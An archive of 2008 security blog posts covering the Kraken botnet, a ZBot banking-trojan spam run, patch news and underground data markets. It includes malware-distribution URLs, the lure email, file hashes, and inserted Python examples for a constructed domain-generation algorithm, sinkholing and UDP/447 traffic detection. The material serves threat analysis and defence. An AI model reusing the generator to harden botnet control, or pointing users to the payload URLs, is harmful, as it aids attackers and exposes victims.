
The machine we used in our tests was 100% free from malicious code, yet the fake page claimed 12 infections. O RLLY?

It then offers the usual malicious “solution” for download. (Source: Websense)

Wednesday

Podcast: AudioParasitics Episode 32: Microsoft Patch Tuesday Special Edition



The latest AudioParasitics is out:

Episode 32 - Microsoft Patch Tuesday Special Edition - MS08-018 - MS08-025 are discussed. Craig Schmugar joins Jim and Dave to discuss the security implications of each bulletin.

Oh yeah, so it was Black Tuesday. Here is also a rundown by the SANS ISC.

And last but not least, in "Patch mania, it's not just Patch Tuesday" I said to watch out for upcoming Adobe Flash patches. It's time!

Adobe has released the security bulletin APSB08-11, to address multiple vulnerabilities in Adobe Flash Player 9.0.115.0 and earlier, and 8.0.39.0 and earlier. The vulnerabilities could lead to the potential execution of arbitrary code remotely. Additionally the update includes DNS rebinding attack and cross-domain policy countermeasures.

Please UPGRADE ASAP to Adobe Flash Player version 9.0.124.0!

Symantec Global Internet Security Threat Report Volume XIII: cyber supermarket black markets



Symantec has released its Global Internet Security Threat Report Volume XIII (a whopping 105 pages). They also have a shorter executive summary.

Some Core Facts:

  • What is the value of a UK identity? – Symantec, today announces that UK identities are being bought and sold in bulk-buy special offers on “cyber crime supermarket” style underground economies, according to the latest edition of its Internet Security Threat Report - Volume XIII.

  • The bi-annual global report found that UK bank account details are being sold on underground economy servers for as little as £5, and are the most commonly advertised item for sale on these “cyber supermarket” black market forums used by criminals to advertise and trade stolen information and services.

  • Where you live also indicates how attractive your identity is to cyber criminals as the report found that EU identities are in much higher demand, being traded at prices 50 per cent higher than American identities. This is because of the flexibility of their use, since EU citizens are able to travel and conduct business freely throughout Europe making them useful to attackers who can use the identities easily across borders.

  • The Internet Security Threat Report also found that the higher the bank balance, the more lucrative it will be when sold on the cyber supermarket, with high value business accounts advertised for considerably more than lower balanced consumer ones. Bank accounts that bundled in personal information such as names, addresses and dates of birth were advertised at higher prices than those without this extra information – indicating how identity thieves are adopting a ‘buy-one-get-one-free’ philosophy.

  • The Symantec report also found that cyber crime is becoming increasingly sophisticated and personalised, with an increase in attacks on the end-user consumer. When it comes to trading, identities have now become a commercial commodity with Symantec observing a new phenomenon of bulk-buying of confidential consumer data – where personal details are packaged up in bargain bundles. For example, during the last six months of 2007, Symantec observed bundles of 50 credit card numbers for sale at £20 (£0.40 each), and 500 credit card bundles for £100 (£0.20 each).

  • After credit cards, full identities were the third most common item advertised for sale on the cyber supermarket, making up nine percent of all advertised goods, an increase from six percent in the first half of 2007. Symantec observed that identity trading is on the increase with some details being sold for as little as 50p - even stolen eBay accounts are up for grabs.

The variety of personal data for sale is constantly growing as cyber criminals are constantly changing and adapting their methods to introduce new tactics to achieve their goal of identity fraud. The report found that Mailers are now one of the most popular ways cybercriminals have designed to mislead Web users. The constant developments of new methods of attack indicates that the underground economy is a mature one. The personalisation of malicious activity and the price bargains and packages available are also indicators of the economy’s sophistication.

Some more details on the 'Kraken' bot, fact or fiction?



After the report of the Kraken botnet from Damballa, several other vendors were skeptical about the report and indicated that it might have been self-advertising and that the risk was overstated. But these are competitors. Was this an attempt at black PR?

Well, instead of just guessing, thanks to Brian Krebs (Washington Post), we have some concrete information.

Apart from that information, the story left many security professionals hungering for more details. Chief among those were: How exactly does Damballa know so precisely how many bots were involved? And how does the company know whether various anti-virus products detect this spam bot as malicious or not?
...

Kraken also uses dynamic DNS services, but adds a twist: The authors include in the genetic makeup of the bot hidden instructions for finding brand new Web site names on the fly. Should security professionals or the dynamic DNS provider succeed in shutting down the domain name used to control the botnet, Kraken randomly creates another one, using an encryption routine built into the bot code.

The reason Damballa knows exactly how many bots are infected with Kraken is that its experts managed to work out the mathematical algorithm Kraken uses to generate dynamic DNS names that will be used in the future to control the botnet. With that information, the company can then go reserve those dynamic DNS names ahead of time, and when the botnet gets around to using them, all of the bots will eventually report to servers Damballa controls.

In fact, if you were to visit this link, which describes in exquisite detail how one variant of the Kraken botnet works, you'd see a list of more than 100 dynamic DNS names at the bottom. Investigate that list a bit further, and you'd find that nearly a third of those point to Internet servers hosted at Georgia Tech, home to many of the Damballa researchers, including the company's chief scientist, David Dagon.

....

Damballa says that in late December 2007 it used Virustotal.com to scan the Kraken code against 32 commercial anti-virus products, and that at the time only 11 of them (34 percent) detected it as malicious -- see the results here (PDF). A more recent scan of the bot code on April 1 (PDF) shows that detection of Kraken among the anti-virus industry has increased, but only slightly -- just 16 of 32 (50 percent) of the anti-virus companies now flag it as bad.

Royal said such dismal detection rates show why anti-virus products are "slowly slipping into a set of security tools whose time has come and gone."

Many folks in the anti-virus and broader Internet security space say Damballa is trying to make a name for itself by hyping this threat, and that Kraken is nothing more than a renamed and repackaged "Bobax," a worm of similar lineage and methods that was discovered several years ago (in February, Security Fix wrote about Damballa research suggesting that the indefatigable "Storm" worm got its start by cannibalizing PCs infected with Bobax).

"We've taken a look at this and it seems the Damballa guys are into rebranding, and that they've simply taken Bobax" and presented it as Kraken, said Dmitri Alperovitch, director of intelligence analysis at Secure Computing, also based in Atlanta.

Regardless of who's right here, this debate between Damballa and the anti-virus industry has happened before and is likely to occur again. That's because the anti-virus industry no longer has the luxury of correctly classifying malicious software: They are doing everything they can just to keep up with the glut of malware being released on the Net each day, and to classify it as malicious.

Read the full article. Thanks Brian !!!!! I have seen some webcasts from Damballa which made some good impressions. I will certainly keep an eye on them.
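Krebs' article explains how Damballa counted the bots: it recovered the routine Kraken uses to derive future rendezvous names and registered those names ahead of time, so the bots eventually reported to hosts Damballa controlled. The block below is an added example, not code from Krebs, Damballa or the Kraken authors, showing that mechanic end to end with a hypothetical date-seeded generator. The seed, the label alphabet, the suffixes and the resolver log are all constructed for the demonstration; the page does not give Kraken's real algorithm, and this is not it.

```python
import hashlib
from datetime import date, timedelta

# Constructed stand-in for a domain generation algorithm. The real Kraken routine
# is not on the page; only the shape (deterministic, time-seeded) is illustrated.
SEED = b"constructed-seed-not-kraken"
SUFFIXES = ("dyn.example.net", "dyn.example.org")  # stand-ins for dynamic DNS providers
ALPHABET = "abcdefghijklmnopqrstuvwxyz"
NAMES_PER_DAY = 4  # how many rendezvous names a bot tries per day (assumed)


def dga_domain(day: date, index: int, seed: bytes = SEED) -> str:
    """Derive the index-th rendezvous name for a given day. Same inputs, same name."""
    digest = hashlib.sha256(seed + day.isoformat().encode() + bytes([index])).digest()
    label = "".join(ALPHABET[b % len(ALPHABET)] for b in digest[:10])
    return f"{label}.{SUFFIXES[digest[10] % len(SUFFIXES)]}"


def bot_candidates(day: date) -> list:
    """Bot side: the names an infected host would try to resolve on that day."""
    return [dga_domain(day, i) for i in range(NAMES_PER_DAY)]


def defender_precompute(start: date, days: int) -> set:
    """Defender side: run the recovered generator forward and collect every name
    to register (sinkhole) before the botnet gets around to using it."""
    names = set()
    for n in range(days):
        names.update(bot_candidates(start + timedelta(days=n)))
    return names


def count_bots(dns_log, sinkholed: set) -> int:
    """Distinct client IPs that queried a sinkholed name: a lower bound on infections."""
    return len({client for client, qname in dns_log if qname in sinkholed})


# Constructed resolver log of (client_ip, queried_name) seen after the sinkhole is up.
DEMO_DAY = date(2008, 4, 8)
DEMO_LOG = [
    ("10.0.0.5", bot_candidates(DEMO_DAY + timedelta(days=2))[0]),
    ("10.0.0.5", bot_candidates(DEMO_DAY + timedelta(days=2))[1]),   # same bot, second try
    ("10.0.0.9", bot_candidates(DEMO_DAY + timedelta(days=12))[3]),  # only caught with a long horizon
    ("10.0.0.7", "www.example.com"),                                  # unrelated lookup
]

if __name__ == "__main__":
    for horizon in (3, 30):
        sinkholed = defender_precompute(DEMO_DAY, horizon)
        print(f"{horizon:2d}-day sinkhole of {len(sinkholed)} names sees "
              f"{count_bots(DEMO_LOG, sinkholed)} bot(s)")
```

The horizon matters: a defender who only pre-registers a few days of names undercounts, which is one reason the exact bot count in such reports depends on how far ahead the algorithm was run. The same precomputed set is also what you would load into a resolver or proxy blocklist to catch the callbacks on your own network.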

UPDATE: SANS ISC has also updated their available information:

Information has just started flowing on the Kraken diary from earlier. As of this moment, I still don't have a sample of this particular malware, but I do have some packet captures of the control traffic.

C&C sends UDP/447 to the victim with packet lengths varying between 66, 115, 116 and 117 bytes. There does not appear to be an obvious pattern in the payload itself. Right now there are about 100 or so hostnames associated with this from dyndns and yi.org. I will publish a list and update this post with that information shortly. According to some malware we believe to be associated with Kraken, it will also use TCP 447 and encode data in some unknown way. (For those with malware zoos, look for MD5s 31b68fe29241d172675ca8c59b97d4f4 and c05eb75e00d54a041a057934979fed6d. Allegedly, MD5 1d51463150db06bc098fef335bc64971 is associated as well). Some other related bins (c1d078b93df31d032cea89f25dc56362, 3a8bd37f9b33de4d29198d125030f587, b0e7ac28f0a899afa0fcdda5f1252675, 1c6d6f727ee55a5797c369f7aa4a0f38, f43bebf91ae2f5cf1f2ad5168bf9d202, ffc2e41d8e729c7b8622a8420767cfb5)

Word on the street is that this may already be detected and it looks like it is just part of the Bobax family of malware related to this article on Dark Reading from last year. Based on the work of others, it appears that this is the malware Kraken is using to infect machines.

Here are some sample packets (this is payload data only, no header):

0000 4d f4 d5 17 dc 04 c1 2e 31 77 aa 1b 9f 38 a0 8c M.......1w...8..
0010 84 22 24 64 68 9e 4c 48 ."$dh.LH

0000 4d f4 d5 17 dc 04 c1 2e d3 87 b7 0a 47 7c 9c e1 M...........G|..
0010 23 03 96 ed 57 ab 5c ea #...W.\.

0000 4d f4 d5 17 dc 04 c1 2e fe dd e2 19 b8 a5 0a df M...............
0010 9e fc 0d 71 66 d6 b2 15 ...qf...

0000 4d f4 d5 17 dc 04 c1 2e db 88 1d 13 ec 3f 86 36 M............?.6
0010 d5 26 51 9c 60 11 5d f2 .&Q.`.].

You'll notice that the first 8 bytes are the same, those first 8 vary between different IP addresses, but the packets coming from the same IP all have that same first 8 bytes. This looks like some sort of session ID / signature that is used throughout the session.

UPDATE: The md5 that Damballa is saying is associated with this malware is MD5: 1d51463150db06bc098fef335bc64971. I'm working with a copy from Project Malfease and will have an analysis later. A Virus Total scan of this binary came back as 5/32 (with the 5 that did detect doing so in non-descript ways like "suspicious file").

UPDATE 2 (4/8/2008 - 13:29 UTC): First things first, Emerging Threats has some test signatures to detect this botnet C&C traffic. You can see them here.

There are some Threat Expert reports on related malware that should give you a good list of hostnames to work with for right now.

http://www.threatexpert.com/report.aspx?uid=83128ea3-453a-46fe-884b-71d05677d3ed

http://www.threatexpert.com/report.aspx?uid=e32f00bb-6b26-477f-a0d6-307000a31924

http://www.threatexpert.com/report.aspx?uid=2b65a341-7f74-413c-9854-a6aca09450f5

http://www.threatexpert.com/report.aspx?uid=c431073f-4321-4bc0-a219-832a10f4f3a0

http://www.threatexpert.com/report.aspx?uid=d04fcd5b-b221-43d0-8dad-95e64ba57145

http://www.threatexpert.com/report.aspx?uid=63606940-900b-4e26-87d9-7453a1518ed6

http://www.threatexpert.com/report.aspx?uid=52accf15-a173-4f90-9482-b2634c151d87

UPDATE 3: (4/9/08 - 0030 UTC)

Also, Threat Expert has a pretty good write-up on what they have for Kraken. They see that the initial "phone home" is over TCP/447, and subsequent communication is UDP/447. The detection is still to look for port 447 traffic crossing your perimeter. That port was used by an old IBM OS for some database stuff. It doesn't appear to have been used in years. Emerging Threats has some sigs (see above), and the UDP packets seem to be pretty consistently 66, 115, 116, or 117 bytes for the *entire packet*.
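The ISC diary gives two concrete handles on the control traffic: whole frames of 66, 115, 116 or 117 bytes on UDP/447, and a constant 8-byte prefix per peer that looks like a session ID. The block below is an added example, not code from the ISC handlers or Emerging Threats, that turns those two observations into a small detector run over a constructed capture. The four 24-byte payloads are the ones quoted in the diary (14 + 20 + 8 bytes of Ethernet/IPv4/UDP headers on top of them give exactly the 66-byte frames the diary reports); the IP addresses and ports, the second "noisy" host and the DNS packet are constructed, and the packet record format is an assumption of this example, not a pcap reader.

```python
from collections import defaultdict

# Whole-frame sizes SANS ISC reported for the UDP/447 control traffic.
KRAKEN_FRAME_LENS = {66, 115, 116, 117}
SESSION_ID_LEN = 8             # leading bytes that stay constant for a given peer
HEADER_OVERHEAD = 14 + 20 + 8  # Ethernet + IPv4 + UDP; a 24-byte payload gives a 66-byte frame


def pkt(src, dst, sport, dport, hexpayload, proto="udp"):
    """Build a minimal packet record (constructed format, not a capture library)."""
    return {"src": src, "dst": dst, "sport": sport, "dport": dport,
            "proto": proto, "payload": bytes.fromhex(hexpayload)}


def frame_len(p):
    """Wire size of the frame, which is what the 66/115/116/117 observation refers to."""
    return HEADER_OVERHEAD + len(p["payload"])


def is_udp447(p):
    return p["proto"] == "udp" and 447 in (p["sport"], p["dport"])


def session_ids(packets):
    """Per source IP, the set of distinct 8-byte prefixes seen on UDP/447."""
    seen = defaultdict(set)
    for p in packets:
        if is_udp447(p) and len(p["payload"]) >= SESSION_ID_LEN:
            seen[p["src"]].add(p["payload"][:SESSION_ID_LEN])
    return seen


def suspect_sources(packets, min_packets=2):
    """Sources that sent at least min_packets Kraken-sized UDP/447 frames and whose
    UDP/447 payloads all share one 8-byte prefix, as the diary describes."""
    counts = defaultdict(int)
    for p in packets:
        if is_udp447(p) and frame_len(p) in KRAKEN_FRAME_LENS:
            counts[p["src"]] += 1
    ids = session_ids(packets)
    return {src for src, n in counts.items() if n >= min_packets and len(ids[src]) == 1}


# Constructed capture. Payloads are the four dumps quoted in the ISC diary; the
# addresses are documentation ranges, not the real C&C hosts.
C2, VICTIM, OTHER = "192.0.2.10", "10.0.0.23", "198.51.100.7"
SAMPLE = [
    pkt(C2, VICTIM, 447, 1034, "4d f4 d5 17 dc 04 c1 2e 31 77 aa 1b 9f 38 a0 8c 84 22 24 64 68 9e 4c 48"),
    pkt(C2, VICTIM, 447, 1034, "4d f4 d5 17 dc 04 c1 2e d3 87 b7 0a 47 7c 9c e1 23 03 96 ed 57 ab 5c ea"),
    pkt(C2, VICTIM, 447, 1034, "4d f4 d5 17 dc 04 c1 2e fe dd e2 19 b8 a5 0a df 9e fc 0d 71 66 d6 b2 15"),
    pkt(C2, VICTIM, 447, 1034, "4d f4 d5 17 dc 04 c1 2e db 88 1d 13 ec 3f 86 36 d5 26 51 9c 60 11 5d f2"),
    # Another host on port 447 with a different prefix every time: right size, wrong pattern.
    pkt(OTHER, VICTIM, 447, 2000, "01 02 03 04 05 06 07 08 aa bb cc dd ee ff 00 11 22 33 44 55 66 77 88 99"),
    pkt(OTHER, VICTIM, 447, 2000, "11 12 13 14 15 16 17 18 aa bb cc dd ee ff 00 11 22 33 44 55 66 77 88 99"),
    # Ordinary DNS from the C2 address: ignored by the port filter.
    pkt(C2, VICTIM, 53, 40000, "ab cd 81 80 00 01 00 01 00 00 00 00"),
]

if __name__ == "__main__":
    for src in sorted(suspect_sources(SAMPLE)):
        sid = next(iter(session_ids(SAMPLE)[src])).hex()
        print(f"{src}: UDP/447, Kraken-sized frames, constant session id {sid}")
```

Requiring both the size set and a stable prefix cuts the false positives a bare port-447 rule would produce, but the prefix is per peer, not global, so a signature has to learn it per flow rather than match the bytes from one capture. Keep the port-only alert as well: the diary notes the port has had no legitimate use in years, so any hit on it is worth a look even before the payload check fires.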

Tuesday

Penetration Testing Directory Project



From spylogic.com:

I stumbled upon a pretty cool project mentioned on the insecure.org mailing list called the "Penetration Testing Directory Project". This project aims to be a directory for all things related to Penetration Testing which include tools, methodologies, companies, websites and more. This does seem something like the Hackerpedia, however, this project looks to be more focused on penetration testing vs. hacking techniques and tools. Would love to see this project in a wiki type format one day.

Which non-executables files are targeted the most?



Non-executable files used to be considered safe to open; only executables could be dangerous. Those days are long gone, and office documents have become a source of infections. But which file types are the most dangerous?

The document I analyzed contains other malformed fields that don’t seem to be related to the bug, so we suspect this document was the result of several experiments of fuzzing techniques. Fuzzing file formats and client applications to find new bugs is an activity that still keeps many security researchers busy, but also many malicious-minded hackers. For readers interested in vulnerabilities and targeted attacks, I suggest that you have a look at this Symantec paper. Attackers are always looking for new bugs, because often a simple crash can be transformed into a zero-day weapon used against companies and organizations.

The following chart has been created by analyzing the number of malicious Trojans exploiting file formats in the last year. Word (.doc) seems to still be the preferred attack vector, but recently we observed some other vectors emerging, such as .xls, .pdf, and also Ichitaro documents (.jtd), which are popular in Japan. Once again, our advice is to be extremely careful when opening any type of email attachment, even when they arrive with a file format considered “safe” and non-executable.

Full article from Symantec.

Monday

Top Infected ASN for March 2008



Infections   AS Name
67771        CHINANET-BACKBONE No.31,Jin-rong Street
24540        CHINA169-BACKBONE CNCGROUP China169 Backbone
13263        CHINANET-SH-AP China Telecom (Group)
8222         DXTNET Beijing Dian-Xin-Tong Network Technologies Co., Ltd.
7602         CNCNET-CN China Netcom Corp.
3772         GOOGLE – Google Inc.
3455         THEPLANET-AS – ThePlanet.com Internet Services, Inc.
2650         CNNIC-GIANT ZhengZhou GIANT Computer Network Technology Co., Ltd
2624         CMNET-V4SHANGHAI-AS-AP Shanghai Mobile Communications Co.,Ltd.
2493         ASN-THEPLANET-4 – ThePlanet.com Internet Services, Inc.

[note] All data provided by Google and Team Cymru.

StopBadware.org provided this list. But wait, don't I know number 2 on the list from somewhere? Déjà vu.

New botnet 'Kraken' is present in 50 out of Fortune 500



In February it was the turn of MayDay, a bot that was quite good at infiltrating corporations. Now there is a new one, Kraken, reported to be twice the size of Storm.

A new botnet twice the size of Storm has ballooned to an army of over 400,000 bots, including machines in the Fortune 500, according to botnet researchers at Damballa.

The so-called Kraken botnet has been spotted in at least 50 Fortune 500 companies and is undetectable in over 80 percent of machines running antivirus software. Kraken appears to be evading detection by a combination of clever obfuscation techniques, including regularly updating its binary code and structuring the code in such a way that hinders any static analysis, says Paul Royal, principal researcher at Damballa.

"It's easy to trace but slow to get antivirus coverage. It seems to imply [the creators] have a good understanding of how AV tools operate and how to evade them," Royal says.

Kraken's successful infiltration of major enterprises is a wakeup call that bots aren't just a consumer problem. Damballa and other botnet experts over the past few months have seen an unsettling rise in bot infections in enterprises.

Royal says like Storm, Kraken so far is mostly being used for spamming the usual scams -- high interest loans, gambling, male enhancement products, pharmacy advertisements, and counterfeit watches, for instance. "But given that it updates its binary, there's no reason it couldn't update itself to a binary that does other things," Royal says. "I'm wondering where this thing is going to go."

...

Just how Kraken is infecting machines is still unclear, but Royal says the malware seems to appear as an image file to the victim. When the victim tries to view the image, the malware is loaded onto his or her machine. "We know the picture... ends in an .exe, which is not shown" to the user, Royal says. (Source: Darkreading.com)

The SANS Internet Storm Center is asking anyone with more details or samples to report them.

UPDATE: SANS ISC has some updates:

C&C sends UDP/447 to the victim with packet lengths varying between 66, 115, 116 and 117 bytes. There does not appear to be an obvious pattern in the payload itself. Right now there are about 100 or so hostnames associated with this from dyndns and yi.org. I will publish a list and update this post with that information shortly. According to some malware we believe to be associated with Kraken, it will also use TCP 447 and encode data in some unknown way. (For those with malware zoos, look for MD5s 31b68fe29241d172675ca8c59b97d4f4 and c05eb75e00d54a041a057934979fed6d. Allegedly, MD5 1d51463150db06bc098fef335bc64971 is associated as well). Some other related bins (c1d078b93df31d032cea89f25dc56362, 3a8bd37f9b33de4d29198d125030f587, b0e7ac28f0a899afa0fcdda5f1252675, 1c6d6f727ee55a5797c369f7aa4a0f38, f43bebf91ae2f5cf1f2ad5168bf9d202, ffc2e41d8e729c7b8622a8420767cfb5)

Word on the street is that this may already be detected and it looks like it is just part of the Bobax family of malware related to this article on Dark Reading from last year. It appears that this malware is what Kraken is using to infect machines, based on the work of others.

Here are some sample packets (this is payload data only, no header):

0000 4d f4 d5 17 dc 04 c1 2e 31 77 aa 1b 9f 38 a0 8c M.......1w...8..
0010 84 22 24 64 68 9e 4c 48 ."$dh.LH

0000 4d f4 d5 17 dc 04 c1 2e d3 87 b7 0a 47 7c 9c e1 M...........G|..
0010 23 03 96 ed 57 ab 5c ea #...W.\.

0000 4d f4 d5 17 dc 04 c1 2e fe dd e2 19 b8 a5 0a df M...............
0010 9e fc 0d 71 66 d6 b2 15 ...qf...

0000 4d f4 d5 17 dc 04 c1 2e db 88 1d 13 ec 3f 86 36 M............?.6
0010 d5 26 51 9c 60 11 5d f2 .&Q.`.].

You'll notice that the first 8 bytes are the same, those first 8 vary between different IP addresses, but the packets coming from the same IP all have that same first 8 bytes. This looks like some sort of session ID / signature that is used throughout the session.
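As an added example (my own code, not part of the ISC post or this blog entry), here is a short Python script that rebuilds the four quoted payloads from their hexdump text, pulls out the 8-byte prefix ISC describes, and checks the "one prefix per source IP" hypothesis. The source addresses and the fifth packet are constructed for the example; ISC did not publish them.

```python
import re
from collections import defaultdict

# The four UDP/447 payloads quoted in the ISC update, in their hexdump layout
# (offset, hex bytes, ASCII column). The source addresses below are NOT from
# ISC; they are constructed (RFC 5737 documentation range) so the per-source
# check has something to work on.
ISC_DUMPS = [
    "0000 4d f4 d5 17 dc 04 c1 2e 31 77 aa 1b 9f 38 a0 8c M.......1w...8..\n"
    "0010 84 22 24 64 68 9e 4c 48 .\"$dh.LH",
    "0000 4d f4 d5 17 dc 04 c1 2e d3 87 b7 0a 47 7c 9c e1 M...........G|..\n"
    "0010 23 03 96 ed 57 ab 5c ea #...W.\\.",
    "0000 4d f4 d5 17 dc 04 c1 2e fe dd e2 19 b8 a5 0a df M...............\n"
    "0010 9e fc 0d 71 66 d6 b2 15 ...qf...",
    "0000 4d f4 d5 17 dc 04 c1 2e db 88 1d 13 ec 3f 86 36 M............?.6\n"
    "0010 d5 26 51 9c 60 11 5d f2 .&Q.`.].",
]
# A fifth packet, entirely made up, standing in for a second C&C host.
CONSTRUCTED_DUMP = (
    "0000 a1 b2 c3 d4 e5 f6 07 18 00 01 02 03 04 05 06 07 ................\n"
    "0010 08 09 0a 0b 0c 0d 0e 0f ........"
)

SESSION_ID_LEN = 8            # ISC: the first 8 bytes are constant per C&C IP
HEX_BYTE = re.compile(r"^[0-9a-fA-F]{2}$")


def parse_hexdump(dump):
    """Rebuild the raw payload from hexdump text.

    Only the offset and the hex columns are trusted; the ASCII column is
    ignored because '.' there stands for any non-printable byte. Hex tokens
    are read until the first token that is not a hex pair (the ASCII column)
    or until 16 bytes, and each line's offset must equal the number of bytes
    already collected, so a dropped or reordered line raises instead of
    silently producing a wrong payload. Caveat: an ASCII column that itself
    contains a space-separated hex-looking pair would be misread.
    """
    payload = bytearray()
    for raw in dump.splitlines():
        tokens = raw.split()
        if not tokens:
            continue
        offset = int(tokens[0], 16)
        if offset != len(payload):
            raise ValueError(f"offset {offset:#06x} but {len(payload)} bytes read so far")
        for tok in tokens[1:17]:
            if not HEX_BYTE.match(tok):
                break
            payload.append(int(tok, 16))
    return bytes(payload)


def session_prefix(payload):
    return payload[:SESSION_ID_LEN]


def sample_packets():
    """(source_ip, payload) pairs: the ISC payloads from one host, the made-up one from another."""
    pkts = [("203.0.113.10", parse_hexdump(d)) for d in ISC_DUMPS]
    pkts.append(("203.0.113.20", parse_hexdump(CONSTRUCTED_DUMP)))
    return pkts


def prefixes_by_source(packets):
    """Map source IP -> set of distinct 8-byte prefixes seen from it."""
    seen = defaultdict(set)
    for src, payload in packets:
        seen[src].add(session_prefix(payload))
    return dict(seen)


def one_prefix_per_source(packets):
    """True when every source uses exactly one prefix, i.e. the prefix behaves
    like a per-session ID rather than a fixed protocol magic you could sign on."""
    return all(len(p) == 1 for p in prefixes_by_source(packets).values())


def tail_diversity(payloads):
    """Fraction of distinct byte values in everything after the prefix, pooled.
    Close to 1.0 is consistent with ISC's 'no obvious pattern in the payload'."""
    tail = b"".join(p[SESSION_ID_LEN:] for p in payloads)
    return len(set(tail)) / len(tail) if tail else 0.0


if __name__ == "__main__":
    for src, prefixes in prefixes_by_source(sample_packets()).items():
        print(src, [p.hex() for p in prefixes])
    print("one prefix per source:", one_prefix_per_source(sample_packets()))
    print("tail diversity:", round(tail_diversity([parse_hexdump(d) for d in ISC_DUMPS]), 3))
```

The practical consequence of the check is that the prefix is useless as a static IDS content match across infections; what you can match on is the port (UDP/447), the small set of packet lengths ISC lists, and the per-host constancy of the first 8 bytes over time.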

UPDATE (09/04/2008): Some more details on the 'Kraken' bot, fact or fiction?

Belgian Wireless drifter arrested



We have seen cases in the UK and the Netherlands where people surfing on somebody else's access point were arrested. Now it's our turn.

In the East-Flemish city of Sint-Gillis-Waas, a 22-year-old man was arrested because he was surfing on the wireless access point of a local resident.
The young man from Sint-Gillis-Waas was parked in his car in front of the resident's house in the Margriet street. The local police arrested the suspect and, after registering the facts, let him go.

It is not known whether the resident's wireless access point was secured or not. Nevertheless, the young man will have to justify himself before a judge on a charge of hacking. Gaining unauthorized access to a computer network is a breach of IT law in any situation.

Connecting by accident to your neighbour's AP is one thing; sitting in your car in front of a house is another. Even if there was no malicious intent, it's just not allowed. So be careful what you do with your laptop or PDA.

You could discuss the morality of the whole thing but that has been done before:

There was also some ongoing local discussion:

The Radio 1 program Peeters & Pichal had a lot of attention on the topic of wireless networks (wardrivers.be).
On the site of Tik vzw (a Belgian consumer group) there is also an ongoing discussion.

Bonus: Old documentary clip from Terzake (Belgian TV)

UPDATE: By the way, the picture above is not from this story and just some funny picture I found. But the story is real.

Het Nieuwsblad
Het belang van Limburg
De Standaard
Tweakers.net

Banking Trojan spam run focused on the Netherlands, Switzerland, Latvia and Finland



Last weekend there was another banking Trojan spam run focused on the Netherlands, Switzerland, Latvia and Finland. The scam mail appears to come from an attractive Russian student looking for a sex partner, and entices the recipient to check out her photographs on a site called livejournalhelper.cn (China). Here is a sample of the Swiss-targeted email (the original is in German):

From: ruffiansma08@healthwi.com

To: dau@rbl.abuse.ch


Subject: Switzherland-Polina

Hello, my name is Polina. I am a student and have come to Switzerland to study.

Now I am looking for a friend and sex partner. All I need is a good man. You should be serious, solid and smart.

Let me know if you want to meet me.

You can also simply be my friend. You can see my photos on my home page http://www.livejournalfuac.cn/pol_ch/

ONLY SERIOUS PROPOSALS PLEASE!

WITH KISSES, ALICE

Unfortunately, the site only has thumbnails of Polina's pictures, and when you try to view them at a larger size you get an error message asking you to install a missing plugin in order to see the pictures. The plugin is of course a man-in-the-middle banking Trojan, a variant of one we have seen before.



F-Secure has an analysis of the original Trojan used last month:
Trojan-Spy:W32/ZBot.HS was discovered on February 20th 2008. ZBot.HS targets a Finnish bank and utilized spam written in Finnish.

The website designs have been used in the past. There are previous examples of German language versions targeting individuals in Switzerland.

ZBot variants use modular components (configuration and commands) downloaded from the Internet after installation. The components are encrypted and hinder full analysis as the ZBot requires an online connection and all components to determine full functionality.

Offline analysis of this variant within our isolated network displays typical banking trojan behavior.

Browser activity is now monitored for multiple ".fi", ".ch", ".de", ".nl" and ".com" bank URL addresses.

Comprehensive analysis of this variant has been completed.

The remote server URL contains a top-level domain of ".ru". The server is hosted in Turkey as of February 21, 2008.

Logging online banking information is the primary payload of Trojan-Spy:W32/Zbot variants.

ZBot searches the following string by default:
  • https://onlineeast#.bankofamerica.com/cgi-bin/ias/*/GotoWelcome
Read the full technical analysis.

Their previous analysis described the remote server URL as .ru but hosted in Turkey. That sounded a lot like the Russian Business Network.

I had a look at this version from livejournalhelper.cn. The page looked very similar to the one described in F-Secure's analysis, and the plugin it asked to install was also "iPIX-install.exe".

I uploaded it to VirusTotal and got 0/32 detections.

File: iPIX-install.exe
File size: 69140 bytes
MD5...: 7618bb4b84831d5cbaef8a2fa517f68c

Strange, so I tried to execute it in a sandbox to check what would happen. Nothing. It seemed to be a corrupt copy of the Trojan. I re-downloaded it from another (fresh) location and PC and got a different binary, MD5 0c208229c50beacc234b8f509ccd79c0:

Engine Version Signature date Result
AhnLab-V3 2008.4.4.1 2008.04.04 -
AntiVir 7.6.0.81 2008.04.04 TR/Crypt.XPACK.Gen
Authentium 4.93.8 2008.04.05 -
Avast 4.7.1098.0 2008.04.04 -
AVG 7.5.0.516 2008.04.05 Dropper.Delf
BitDefender 7.2 2008.04.05 -
CAT-QuickHeal 9.50 2008.04.05 -
ClamAV 0.92.1 2008.04.05 -
DrWeb 4.44.0.09170 2008.04.05 -
eSafe 7.0.15.0 2008.04.01 suspicious Trojan/Worm
eTrust-Vet 31.3.5672 2008.04.04 -
Ewido 4.0 2008.04.05 -
F-Prot 4.4.2.54 2008.04.05 -
F-Secure 6.70.13260.0 2008.04.05 Trojan-Dropper.Win32.Agent.ocn
FileAdvisor 1 2008.04.05 -
Fortinet 3.14.0.0 2008.04.05 -
Ikarus T3.1.1.20 2008.04.05 Packer.Malware.FriCryptor.B
Kaspersky 7.0.0.125 2008.04.05 Trojan-Dropper.Win32.Agent.ocn
McAfee 5267 2008.04.04 New Win32
Microsoft 1.3408 2008.04.05 -
NOD32v2 3004 2008.04.05 -
Norman 5.80.02 2008.04.04 -
Panda 9.0.0.4 2008.04.05 Suspicious file
Prevx1 V2 2008.04.05 Covert.Code
Rising 20.38.60.00 2008.04.03 -
Sophos 4.28.0 2008.04.05 Mal/Generic-A
Sunbelt 3.0.1032.0 2008.04.05 -
Symantec 10 2008.04.05 -
TheHacker 6.2.92.265 2008.04.04 -
VBA32 3.12.6.3 2008.03.25 -
VirusBuster 4.3.26:9 2008.04.04 -
Webwasher-Gateway 6.6.2 2008.04.04 Trojan.Crypt.XPACK.Gen

Additional information
File size: 59758 bytes
MD5: 0c208229c50beacc234b8f509ccd79c0

Result: 11/32. Not great, as usual. Here is a complete rundown of the files and processes it changes.

For each language version a different URL is used:
www.livejournalfuac.cn/pol_ch/ (Switzerland)
www.livejournalfuac.cn/pol_lv/ (Latvia)
www.livejournalfuac.cn/pol_nl/ (Netherlands)
www.livejournalfuac.cn/pol_fi/ (Finland)
The website resolves to 58.22.101.116 (58.22.100.0 - 58.22.103.255), hosted on the Fuzhou city, Fujian provincial network of CNCGROUP in China. I couldn't find any relation with previously known ranges used by the RBN, but I did find that another IP in the same /24, 58.22.101.236, is in the DShield database.

